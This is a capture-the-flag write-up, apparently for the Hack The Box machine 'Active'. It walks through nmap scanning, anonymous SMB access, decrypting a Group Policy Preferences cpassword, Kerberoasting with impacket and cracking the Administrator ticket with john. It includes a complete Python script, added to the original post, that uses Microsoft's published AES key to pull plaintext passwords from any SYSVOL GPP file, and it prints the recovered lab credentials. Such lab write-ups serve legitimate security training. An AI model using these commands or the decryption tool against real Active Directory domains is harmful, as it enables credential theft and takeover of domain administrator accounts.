Basic information

Port scan

Domain controller:

$ nmap -sC -sV 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-11 13:36 CST
Nmap scan report for 10.10.10.100
Host is up (0.069s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-11 05:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-11T05:37:43
|_ start_date: 2020-11-11T05:12:05

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.72 seconds

SMB

SMB allows anonymous (null-session) access:

Replication

This share holds a Group Policy Preferences file, Groups.xml (the kind that normally lives under a policy's Preferences\Groups directory in SYSVOL):

Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

gpp-decrypt

gpp-decrypt recovers the password directly: the cpassword value is AES-256-CBC ciphertext under a fixed key that Microsoft published on MSDN (MS14-025 stopped new cpassword entries from being created, but existing files such as this one are still readable by any domain user):

➜  Groups gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

# username : active.htb\SVC_TGS
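The decryption itself is short enough to do without gpp-decrypt. The following script is an added example, not code from the original post: it restores the base64 padding that GPP strips, decrypts with the published key and an all-zero IV, removes the PKCS#7 padding and decodes the UTF-16LE password. It goes slightly beyond the page by also reading the userName/accountName/runAs attributes used by Drives.xml, Services.xml and ScheduledTasks.xml, so the same parser works on any GPP file found in SYSVOL. The embedded XML is the Groups.xml shown above; the AES backend fallbacks (pycryptodome, cryptography, the openssl CLI) are assumptions about what is installed on the attacking host.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published on MSDN for GPP cpassword fields (MS14-025).
# Anyone who can read SYSVOL can decrypt every cpassword in the domain with it.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_AES_IV = bytes(16)  # GPP uses an all-zero IV

# Constructed sample input: the Groups.xml from the Replication share above.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""


def aes256_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-256-CBC decryption, padding left in place.

    Backend choice is an assumption about the attacking host: pycryptodome
    (impacket depends on it), then cryptography, then the openssl binary.
    """
    try:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        pass
    try:
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend()).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        pass
    import subprocess
    return subprocess.run(
        ["openssl", "enc", "-d", "-aes-256-cbc", "-nopad",
         "-K", key.hex(), "-iv", iv.hex()],
        input=data, capture_output=True, check=True,
    ).stdout


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a GPP cpassword attribute into the plaintext password."""
    padded = cpassword + "=" * (-len(cpassword) % 4)  # GPP drops the '=' padding
    raw = aes256_cbc_decrypt(GPP_AES_KEY, GPP_AES_IV, base64.b64decode(padded))
    pad = raw[-1]  # PKCS#7: last byte is the pad length
    if not 1 <= pad <= 16 or raw[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: wrong key or corrupted cpassword")
    return raw[:-pad].decode("utf-16-le")  # GPP stores the password as UTF-16LE


def extract_gpp_credentials(xml_text: str):
    """Return (account, password) pairs for every cpassword in a GPP XML file."""
    creds = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for props in root.iter("Properties"):
        cpass = props.get("cpassword")
        if not cpass:
            continue
        # Groups.xml/Drives.xml use userName, Services.xml accountName,
        # ScheduledTasks.xml runAs.
        account = props.get("userName") or props.get("accountName") or props.get("runAs") or "?"
        creds.append((account, decrypt_cpassword(cpass)))
    return creds


if __name__ == "__main__":
    for account, password in extract_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account} : {password}")
```

Run it against any Groups.xml, Drives.xml, Services.xml or ScheduledTasks.xml pulled from SYSVOL; a padding error means the file is not a cpassword file or was corrupted in transfer, not that the key is wrong.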

SVC_TGS SMB

Then continue enumerating with this account:

Users

The Users share is the C:\Users directory; user.txt is on the SVC_TGS user's Desktop.

user flag

Kerberoasting

For a detailed explanation of Kerberoasting, see 三好学生's blog:

GetUserSPNs

python3 ~/Tools/impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f86e00a3c81a83de26d8b81b3098d6ce$…

john

Then crack this hash to get the Administrator password. The $23$ marks RC4-HMAC: the service ticket is encrypted under the service account's NT hash, so each guess costs one MD4 plus a couple of HMAC-MD5 calls, which is why Kerberoasting an RC4 ticket is so cheap compared with AES (etype 17/18, PBKDF2 with 4096 iterations per guess):

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Ticketmaster1968

system shell

This password then gives a SYSTEM shell:

root flag

root.txt is on the Administrator user's Desktop:

References